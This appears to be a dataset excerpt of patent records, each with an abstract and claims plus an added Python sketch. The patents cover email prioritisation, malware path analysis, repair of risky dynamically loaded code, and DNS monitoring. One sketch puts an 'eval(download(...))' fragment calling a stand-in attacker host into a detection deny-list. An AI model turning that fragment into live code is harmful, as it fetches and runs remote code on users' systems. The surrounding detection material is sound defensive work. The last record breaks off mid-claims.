9,146 | 9,146 | 13,804,914 | 2,419 | Technologies are generally described for providing an email assistant for sorting through emails received at an email application. The email assistant may prioritize emails and group high and low priority emails separately to enable a user to quickly view and manage an email inbox. The email assistant may also provide suggestions on how to sort and manage emails in the inbox of the email application. The email assistant may observe a user's pattern of interactions with types of emails, and prioritize emails and suggest actions based on the user's interactions. The email assistant may be configured to automatically sort emails and provide management suggestions based on a detected scenario such as a user's return after a period of time away, a large influx of emails, and presence detection. | 1. A method to be executed at least in part in a computing device for providing an email assistant for sorting and managing emails, the method comprising:
detecting a plurality of emails received through an email application; prioritizing the emails into two or more groups; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails. 2. The method of claim 1, further comprising:
analyzing a user's pattern of interactions with received emails; and determining a number of groups and prioritizing the emails into the groups based on the analysis of the user's pattern of interactions. 3. The method of claim 1, wherein prioritizing the emails into the groups comprises:
determining one or more characteristics associated with each email, the characteristics including a sender, a subject, and a domain name of the sender; and identifying a user action associated with an email of similar characteristics, the user action including one or more of deleting, ignoring, delaying a response to, flagging, saving, and replying to the email of similar characteristics. 4. The method of claim 1, wherein the two or more groups include a group of high priority emails and a group of low priority emails. 5. The method of claim 4, further comprising:
displaying a folder of low priority emails in a separate section from a folder of high priority emails on a user interface of the email application, wherein the folder of low priority emails hides the low priority emails from view. 6. The method of claim 5, further comprising:
providing an expansion control for expanding the folder of low priority emails to display the low priority emails. 7. The method of claim 4, further comprising:
displaying the folder of low priority emails and the folder of high priority emails in separate sections presented on a toolbar of the email application; and upon receiving a selection of one of the folder of low priority emails and the folder of high priority emails on the toolbar, displaying a list of emails included in the selected folder. 8. The method of claim 7, further comprising:
providing a control for a bulk action associated with the folder of low priority emails to delete the emails included in the folder of low priority emails. 9. The method of claim 7, further comprising:
enabling the user to move a selected email from the folder of low priority emails to the folder of high priority emails. 10. The method of claim 1, further comprising:
automatically displaying the suggestion pane based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 11. The method of claim 1, the suggested actions comprise one or more of: a bulk action to delete emails in a selected group, an action to view a list of emails included in a selected group, an action to view a list of emails sharing a common characteristic, and no action. 12. A computing device for providing an email assistant for sorting and managing emails, the computing device comprising:
a memory; a display; and a processor coupled to the memory and the display, the processor configured to provide a user interface associated with an email application, wherein the email application is configured to:
detect a plurality of emails received through an email application;
analyze a user's pattern of interactions with received emails;
determine a number of groups for the received emails and prioritize the emails into two or more groups based on the analysis of the user's pattern of interactions;
group the prioritized emails in respective folders; and
display a suggestion pane providing suggested actions for managing the folders of prioritized emails based on the analysis of the user's pattern of interactions. 13. The computing device of claim 12, wherein the email application is further configured to:
perform a suggested action automatically based on the analysis of the user's pattern of interactions. 14. The computing device of claim 12, wherein the email application is further configured to:
display a control for a suggested action on each email listed within a folder of emails. 15. The computing device of claim 12, wherein the email application is further configured to:
provide a control for a bulk action associated with at least one of the folders on the suggestion pane; and upon user activation of the control for the bulk action, display a confirmation of the bulk action. 16. The computing device of claim 12, wherein the email application is further configured to enable user interaction with the user interface through one or more of: a touch input, a gesture input, a keyboard input, a mouse input, a pen input, a voice command, and an eye-tracking input. 17. The computing device of claim 12, wherein the email application is one of a hosted service accessed through a browser executed on the computing device and a locally installed application executed on the computing device. 18. A computer-readable memory device with instructions stored thereon for providing an email assistant for sorting and managing emails, the instructions comprising:
analyzing a user's pattern of interactions with received emails; detecting a plurality of emails received through an email application; determining a number of groups and prioritizing the emails into two or more groups based on the analysis of the user's pattern of interactions; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 19. The computer-readable memory device of claim 18, wherein the instructions further comprise:
displaying different viewing and sorting suggestions based on a client device used for viewing a user interface of the email application. 20. The computer-readable memory device of claim 19, wherein the instructions further comprise:
activating the email assistant at predefined times configurable by a user. | Technologies are generally described for providing an email assistant for sorting through emails received at an email application. The email assistant may prioritize emails and group high and low priority emails separately to enable a user to quickly view and manage an email inbox. The email assistant may also provide suggestions on how to sort and manage emails in the inbox of the email application. The email assistant may observe a user's pattern of interactions with types of emails, and prioritize emails and suggest actions based on the user's interactions. The email assistant may be configured to automatically sort emails and provide management suggestions based on a detected scenario such as a user's return after a period of time away, a large influx of emails, and presence detection.1. A method to be executed at least in part in a computing device for providing an email assistant for sorting and managing emails, the method comprising:
detecting a plurality of emails received through an email application; prioritizing the emails into two or more groups; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails. 2. The method of claim 1, further comprising:
analyzing a user's pattern of interactions with received emails; and determining a number of groups and prioritizing the emails into the groups based on the analysis of the user's pattern of interactions. 3. The method of claim 1, wherein prioritizing the emails into the groups comprises:
determining one or more characteristics associated with each email, the characteristics including a sender, a subject, and a domain name of the sender; and identifying a user action associated with an email of similar characteristics, the user action including one or more of deleting, ignoring, delaying a response to, flagging, saving, and replying to the email of similar characteristics. 4. The method of claim 1, wherein the two or more groups include a group of high priority emails and a group of low priority emails. 5. The method of claim 4, further comprising:
displaying a folder of low priority emails in a separate section from a folder of high priority emails on a user interface of the email application, wherein the folder of low priority emails hides the low priority emails from view. 6. The method of claim 5, further comprising:
providing an expansion control for expanding the folder of low priority emails to display the low priority emails. 7. The method of claim 4, further comprising:
displaying the folder of low priority emails and the folder of high priority emails in separate sections presented on a toolbar of the email application; and upon receiving a selection of one of the folder of low priority emails and the folder of high priority emails on the toolbar, displaying a list of emails included in the selected folder. 8. The method of claim 7, further comprising:
providing a control for a bulk action associated with the folder of low priority emails to delete the emails included in the folder of low priority emails. 9. The method of claim 7, further comprising:
enabling the user to move a selected email from the folder of low priority emails to the folder of high priority emails. 10. The method of claim 1, further comprising:
automatically displaying the suggestion pane based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 11. The method of claim 1, wherein the suggested actions comprise one or more of: a bulk action to delete emails in a selected group, an action to view a list of emails included in a selected group, an action to view a list of emails sharing a common characteristic, and no action. 12. A computing device for providing an email assistant for sorting and managing emails, the computing device comprising:
a memory; a display; and a processor coupled to the memory and the display, the processor configured to provide a user interface associated with an email application, wherein the email application is configured to:
detect a plurality of emails received through an email application;
analyze a user's pattern of interactions with received emails;
determine a number of groups for the received emails and prioritize the emails into two or more groups based on the analysis of the user's pattern of interactions;
group the prioritized emails in respective folders; and
display a suggestion pane providing suggested actions for managing the folders of prioritized emails based on the analysis of the user's pattern of interactions. 13. The computing device of claim 12, wherein the email application is further configured to:
perform a suggested action automatically based on the analysis of the user's pattern of interactions. 14. The computing device of claim 12, wherein the email application is further configured to:
display a control for a suggested action on each email listed within a folder of emails. 15. The computing device of claim 12, wherein the email application is further configured to:
provide a control for a bulk action associated with at least one of the folders on the suggestion pane; and upon user activation of the control for the bulk action, display a confirmation of the bulk action. 16. The computing device of claim 12, wherein the email application is further configured to enable user interaction with the user interface through one or more of: a touch input, a gesture input, a keyboard input, a mouse input, a pen input, a voice command, and an eye-tracking input. 17. The computing device of claim 12, wherein the email application is one of a hosted service accessed through a browser executed on the computing device and a locally installed application executed on the computing device. 18. A computer-readable memory device with instructions stored thereon for providing an email assistant for sorting and managing emails, the instructions comprising:
analyzing a user's pattern of interactions with received emails; detecting a plurality of emails received through an email application; determining a number of groups and prioritizing the emails into two or more groups based on the analysis of the user's pattern of interactions; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 19. The computer-readable memory device of claim 18, wherein the instructions further comprise:
displaying different viewing and sorting suggestions based on a client device used for viewing a user interface of the email application. 20. The computer-readable memory device of claim 19, wherein the instructions further comprise:
activating the email assistant at predefined times configurable by a user. | 2,400 |
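The claims above describe prioritizing incoming emails into high- and low-priority folders based on an analysis of the user's past interactions (e.g., replying, flagging, deleting, ignoring) with emails sharing characteristics such as the sender's domain. A minimal sketch of that idea follows; the action categories, data shapes, and domain names are hypothetical illustrations, not part of the patented method.

```python
from collections import defaultdict

# Hypothetical signal sets: replies/flags/saves suggest high priority,
# deletes/ignores suggest low priority.
HIGH_SIGNAL = {"reply", "flag", "save"}
LOW_SIGNAL = {"delete", "ignore"}

def build_profile(history):
    """Count high- and low-signal actions per sender domain from the
    user's observed pattern of interactions."""
    profile = defaultdict(lambda: {"high": 0, "low": 0})
    for domain, action in history:
        if action in HIGH_SIGNAL:
            profile[domain]["high"] += 1
        elif action in LOW_SIGNAL:
            profile[domain]["low"] += 1
    return profile

def prioritize(emails, profile):
    """Group incoming emails into high/low priority folders based on
    the interaction profile of each email's sender domain."""
    folders = {"high": [], "low": []}
    for email in emails:
        counts = profile.get(email["domain"], {"high": 0, "low": 0})
        key = "high" if counts["high"] >= counts["low"] else "low"
        folders[key].append(email)
    return folders

history = [("work.example", "reply"), ("deals.example", "delete"),
           ("deals.example", "ignore"), ("work.example", "flag")]
emails = [{"subject": "Q3 report", "domain": "work.example"},
          {"subject": "50% off!", "domain": "deals.example"}]
folders = prioritize(emails, build_profile(history))
```

A suggestion pane as claimed could then offer bulk actions (e.g., delete all) on the low-priority folder while keeping the high-priority folder expanded.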
9,147 | 9,147 | 16,113,154 | 2,439 | The present disclosure relates to malware and, more particularly, towards systems and methods of processing information associated with detecting and handling malware. According to certain illustrative implementations, methods of processing malware are disclosed. Moreover, such methods may include one or more of unpacking and/or decrypting malware samples, dynamically analyzing the samples, disassembling and/or reverse engineering the samples, performing static analysis of the samples, determining latent logic execution path information regarding the samples, classifying the samples, and/or providing intelligent report information regarding the samples. | 1-83. (canceled) 84. At least one non-transitory computer-readable medium comprising instructions, that, when executed by a processor, are to:
execute malware code within a native operating system of the malware code; generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of the executed logic paths; identify a latent behavior of the malware code based on the log of the non-executed logic paths; and create a malware repair program based on the log of the executed logic paths and the log of the non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 85. The at least one non-transitory computer-readable medium of claim 84, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 86. The at least one non-transitory computer-readable medium of claim 85, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 87. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 88. The at least one non-transitory computer-readable medium of claim 87, wherein the instructions, when executed by the processor, are to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 89. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 90. The at least one non-transitory computer-readable medium of claim 89, wherein the graph comprises an electronic graphical representation of the executed logic paths and the non-executed logic paths of the malware code, the electronic graphical representation comprising:
a first indicia representing the executed logic paths, and a second indicia representing the non-executed logic paths. 91. An apparatus comprising:
an analysis component configured to:
execute malware code within a native operating system of the malware code; and
generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code;
a management component configured to:
generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths;
identify a latent behavior of the malware code based on the log of non-executed logic paths; and
create a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 92. The apparatus of claim 91, wherein the management component operates in an operating system that is different from the native operating system of the malware code. 93. The apparatus of claim 91, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 94. The apparatus of claim 93, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 95. The apparatus of claim 91, wherein the management component is configured to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 96. The apparatus of claim 95, wherein the management component is configured to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 97. The apparatus of claim 91, wherein the management component is configured to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 98. A method comprising:
executing malware code within a native operating system of the malware code; generating a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generating a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths; identifying a latent behavior of the malware code based on the log of non-executed logic paths; and creating a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 99. The method of claim 98, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 100. The method of claim 99, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 101. The method of claim 98, further comprising:
preparing a boot image in an operating system that is different from the native operating system of the malware code. 102. The method of claim 101, further comprising: generating an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 103. The method of claim 98, further comprising:
generating a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. | The present disclosure relates to malware and, more particularly, towards systems and methods of processing information associated with detecting and handling malware. According to certain illustrative implementations, methods of processing malware are disclosed. Moreover, such methods may include one or more of unpacking and/or decrypting malware samples, dynamically analyzing the samples, disassembling and/or reverse engineering the samples, performing static analysis of the samples, determining latent logic execution path information regarding the samples, classifying the samples, and/or providing intelligent report information regarding the samples.1-83. (canceled) 84. At least one non-transitory computer-readable medium comprising instructions, that, when executed by a processor, are to:
execute malware code within a native operating system of the malware code; generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of the executed logic paths; identify a latent behavior of the malware code based on the log of the non-executed logic paths; and create a malware repair program based on the log of the executed logic paths and the log of the non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 85. The at least one non-transitory computer-readable medium of claim 84, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 86. The at least one non-transitory computer-readable medium of claim 85, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 87. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 88. The at least one non-transitory computer-readable medium of claim 87, wherein the instructions, when executed by the processor, are to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 89. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 90. The at least one non-transitory computer-readable medium of claim 89, wherein the graph comprises an electronic graphical representation of the executed logic paths and the non-executed logic paths of the malware code, the electronic graphical representation comprising:
a first indicia representing the executed logic paths, and a second indicia representing the non-executed logic paths. 91. An apparatus comprising:
an analysis component configured to:
execute malware code within a native operating system of the malware code; and
generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code;
a management component configured to:
generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths;
identify a latent behavior of the malware code based on the log of non-executed logic paths; and
create a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 92. The apparatus of claim 91, wherein the management component operates in an operating system that is different from the native operating system of the malware code. 93. The apparatus of claim 91, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 94. The apparatus of claim 93, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 95. The apparatus of claim 91, wherein the management component is configured to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 96. The apparatus of claim 95, wherein the management component is configured to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 97. The apparatus of claim 91, wherein the management component is configured to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 98. A method comprising:
executing malware code within a native operating system of the malware code; generating a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generating a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths; identifying a latent behavior of the malware code based on the log of non-executed logic paths; and creating a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 99. The method of claim 98, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 100. The method of claim 99, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 101. The method of claim 98, further comprising:
preparing a boot image in an operating system that is different from the native operating system of the malware code. 102. The method of claim 101, further comprising: generating an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 103. The method of claim 98, further comprising:
generating a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. | 2,400 |
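The malware-analysis claims above revolve around logging which logic paths of a sample actually executed in its native environment, deriving the non-executed paths as the complement, and flagging never-reached blocks as potential latent behavior. A minimal sketch of that bookkeeping follows; the block names and the date-gated trigger are hypothetical, and real tooling would derive the full block set from disassembly rather than a hardcoded set.

```python
# Hypothetical set of all basic blocks known from static analysis
# of the sample.
ALL_BLOCKS = {"entry", "check_date", "payload", "cleanup", "exit"}

def trace_execution(trigger_date_met: bool):
    """Simulate one run of the sample and log the logic paths
    that actually executed."""
    executed = ["entry", "check_date"]
    if trigger_date_met:  # latent behavior gated on a condition
        executed.append("payload")
    executed += ["cleanup", "exit"]
    return executed

# The trigger condition was not met during this run, so the
# payload block never executes.
executed_log = trace_execution(trigger_date_met=False)

# Non-executed log = all known blocks minus the executed ones;
# blocks never reached point at latent behavior.
non_executed_log = sorted(ALL_BLOCKS - set(executed_log))
```

A repair program as claimed could then be generated from both logs, e.g., including instructions that undo effects of the executed paths and preemptively neutralize the latent `payload` path.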
9,148 | 9,148 | 15,413,941 | 2,435 | Disclosed are various embodiments for performing security verifications for dynamic applications. An application is executed and it is determined that the application requests access to dynamically loaded code. In response to determining a security risk associated with the dynamically loaded code, a portion of the dynamically loaded code is modified to eliminate the security risk. | 1. A system, comprising:
at least one computing device; and at least one application executable by the at least one computing device, wherein, when executed, the at least one application causes the at least one computing device to at least:
execute an instance of an application in a sandboxed environment;
determine that the instance of the application is requesting access to dynamically loaded code;
determine a security risk associated with the dynamically loaded code; and
modify a portion of the dynamically loaded code to eliminate the security risk, a remaining portion of the dynamically loaded code being unmodified. 2. The system of claim 1, wherein modifying a portion of the dynamically loaded code comprises repairing the portion of the dynamically loaded code. 3. The system of claim 1, wherein modifying the portion of the dynamically loaded code comprises replacing the portion of the dynamically loaded code with another portion of code. 4. The system of claim 1, wherein the application is one of a plurality of applications being offered for at least one of download or sale via an application marketplace. 5. The system of claim 1, wherein the security risk is determined based at least in part on at least one of: a version of the dynamically loaded code, a signature of the dynamically loaded code, a source of the dynamically loaded code, a previous security evaluation, or a code inspection of the dynamically loaded code. 6. The system of claim 1, wherein determining that the application requests access to the dynamically loaded code further comprises detecting at least one of: a download of data to executable code memory of the at least one computing device or previously downloaded data including recognizable executable code. 7. A method, comprising:
executing, via at least one of one or more computing devices, an application in a sandboxed environment; determining, via at least one of the one or more computing devices, that the application is attempting to access dynamically loaded code; and modifying, via at least one of the one or more computing devices, a portion of the dynamically loaded code to repair a detected security risk of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 8. The method of claim 7, wherein the one or more computing devices comprises a client device. 9. The method of claim 8, further comprising:
routing, via the client device, the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 10. The method of claim 8, further comprising:
routing, via the client device, a uniform resource locator (URL) corresponding to the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 11. The method of claim 7, further comprising performing, via at least one of the one or more computing devices, a security evaluation of the dynamically loaded code, the detected security risk being detected as a result of the security evaluation. 12. The method of claim 11, wherein the security evaluation is based at least in part on a prior security evaluation of the dynamically loaded code. 13. The method of claim 7, wherein the application is being offered for at least one of download or sale via an application marketplace, and an offering of the application via the application marketplace includes a flag indicating a potential security risk. 14. The method of claim 7, further comprising identifying the security risk based at least in part on at least one of: a version of the dynamically loaded code or a source of the dynamically loaded code. 15. A system, comprising:
a client device; and a first application executable by the client device, wherein, when executed, the first application causes the client device to at least:
execute a second application;
determine that the second application accesses dynamically loaded code;
determine a security risk associated with the dynamically loaded code in response to an evaluation of the dynamically loaded code; and
reduce the security risk by modifying a portion of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 16. The system of claim 15, wherein the second application is executed in a sandboxed environment. 17. The system of claim 16, wherein the sandboxed environment comprises an emulator of the client device. 18. The system of claim 16, wherein the sandboxed environment comprises a prevention layer configured to prevent access by the second application to resources of the client device. 19. The system of claim 15, wherein determining the security risk further comprises:
transmitting the dynamically loaded code to a computing device over a network, the evaluation being performed by the computing device; and receiving an indication of the security risk from the computing device. 20. The system of claim 15, wherein determining that the second application accesses the dynamically loaded code further comprises:
determining that the second application attempts to contact an external network site without using a required application programming interface (API) call. | Disclosed are various embodiments for performing security verifications for dynamic applications. An application is executed and it is determined that the application requests access to dynamically loaded code. In response to determining a security risk associated with the dynamically loaded code, a portion of the dynamically loaded code is modified to eliminate the security risk.1. A system, comprising:
at least one computing device; and at least one application executable by the at least one computing device, wherein, when executed, the at least one application causes the at least one computing device to at least:
execute an instance of an application in a sandboxed environment;
determine that the instance of the application is requesting access to dynamically loaded code;
determine a security risk associated with the dynamically loaded code; and
modify a portion of the dynamically loaded code to eliminate the security risk, a remaining portion of the dynamically loaded code being unmodified. 2. The system of claim 1, wherein modifying a portion of the dynamically loaded code comprises repairing the portion of the dynamically loaded code. 3. The system of claim 1, wherein modifying the portion of the dynamically loaded code comprises replacing the portion of the dynamically loaded code with another portion of code. 4. The system of claim 1, wherein the application is one of a plurality of applications being offered for at least one of download or sale via an application marketplace. 5. The system of claim 1, wherein the security risk is determined based at least in part on at least one of: a version of the dynamically loaded code, a signature of the dynamically loaded code, a source of the dynamically loaded code, a previous security evaluation, or a code inspection of the dynamically loaded code. 6. The system of claim 1, wherein determining that the application requests access to the dynamically loaded code further comprises detecting at least one of: a download of data to executable code memory of the at least one computing device or previously downloaded data including recognizable executable code. 7. A method, comprising:
executing, via at least one of one or more computing devices, an application in a sandboxed environment; determining, via at least one of the one or more computing devices, that the application is attempting to access dynamically loaded code; and modifying, via at least one of the one or more computing devices, a portion of the dynamically loaded code to repair a detected security risk of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 8. The method of claim 7, wherein the one or more computing devices comprises a client device. 9. The method of claim 8, further comprising:
routing, via the client device, the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 10. The method of claim 8, further comprising:
routing, via the client device, a uniform resource locator (URL) corresponding to the dynamically loaded code to a server device via a proxy service; and receiving, via the client device, an indication of the detected security risk via the server device. 11. The method of claim 7, further comprising performing, via at least one of the one or more computing devices, a security evaluation of the dynamically loaded code, the detected security risk being detected as a result of the security evaluation. 12. The method of claim 11, wherein the security evaluation is based at least in part on a prior security evaluation of the dynamically loaded code. 13. The method of claim 7, wherein the application is being offered for at least one of download or sale via an application marketplace, and an offering of the application via the application marketplace includes a flag indicating a potential security risk. 14. The method of claim 7, further comprising identifying the security risk based at least in part on at least one of: a version of the dynamically loaded code or a source of the dynamically loaded code. 15. A system, comprising:
a client device; and a first application executable by the client device, wherein, when executed, the first application causes the client device to at least:
execute a second application;
determine that the second application accesses dynamically loaded code;
determine a security risk associated with the dynamically loaded code in response to an evaluation of the dynamically loaded code; and
reduce the security risk by modifying a portion of the dynamically loaded code, a remaining portion of the dynamically loaded code being unmodified. 16. The system of claim 15, wherein the second application is executed in a sandboxed environment. 17. The system of claim 16, wherein the sandboxed environment comprises an emulator of the client device. 18. The system of claim 16, wherein the sandboxed environment comprises a prevention layer configured to prevent access by the second application to resources of the client device. 19. The system of claim 15, wherein determining the security risk further comprises:
transmitting the dynamically loaded code to a computing device over a network, the evaluation being performed by the computing device; and receiving an indication of the security risk from the computing device. 20. The system of claim 15, wherein determining that the second application accesses the dynamically loaded code further comprises:
determining that the second application attempts to contact an external network site without using a required application programming interface (API) call. | 2,400 |
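The claims above describe evaluating dynamically loaded code in a sandboxed environment (e.g., by signature) and modifying only the risky portion while leaving the rest unmodified. A minimal sketch follows; the deny-list, the `SAFE_STUB` replacement, and the code fragments are hypothetical stand-ins for the signature databases and repair logic a real system would use.

```python
import hashlib

# Hypothetical deny-list: SHA-256 digests of code fragments previously
# evaluated as risky.
KNOWN_RISKY = {
    hashlib.sha256(b"eval(download('http://evil.example'))").hexdigest(),
}

# Replacement that neutralizes a risky fragment.
SAFE_STUB = "pass  # risky fragment neutralized"

def evaluate_and_repair(fragments):
    """Signature-check each dynamically loaded fragment; replace risky
    fragments with a safe stub, leaving the remainder unmodified."""
    repaired = []
    for frag in fragments:
        digest = hashlib.sha256(frag.encode()).hexdigest()
        repaired.append(SAFE_STUB if digest in KNOWN_RISKY else frag)
    return repaired

loaded = ["x = 1 + 1", "eval(download('http://evil.example'))"]
result = evaluate_and_repair(loaded)
```

The evaluation could equally run server-side, as in claims 9, 10, and 19, with the client routing the fragments (or their URLs) through a proxy service and receiving back an indication of the detected risk.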
9,149 | 9,149 | 15,256,418 | 2,439 | This specification generally relates to methods and systems for applying network policies to devices based on their current access network. One example method includes identifying a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with the computer identified by the hostname on behalf of the client device; determining an identity of the client device based on the proxy connection request; identifying a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request; and updating DNS usage information for the particular client based on the identified DNS response including the hostname from the proxy connection request. | 1. A computer-implemented method executed by one or more processors, the method comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 2. The method of claim 1, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 3. The method of claim 1, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 4. The method of claim 1, wherein the hostname is included in a Uniform Resource Locator (URL). 5. The method of claim 1, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 6. The method of claim 1, further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 7. The method of claim 6, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 8. A non-transitory, computer-readable medium storing instructions operable when executed to cause at least one processor to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 9. The non-transitory, computer-readable medium of claim 8, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 10. The non-transitory, computer-readable medium of claim 9, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 11. The non-transitory, computer-readable medium of claim 8, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 12. The non-transitory, computer-readable medium of claim 8, wherein the hostname is included in a Uniform Resource Locator (URL). 13. The non-transitory, computer-readable medium of claim 8, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 14. The non-transitory, computer-readable medium of claim 8, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 15. A system comprising:
memory for storing data; and one or more processors operable to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network;
identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network;
determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and
in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 16. The system of claim 15, the operations further comprising:
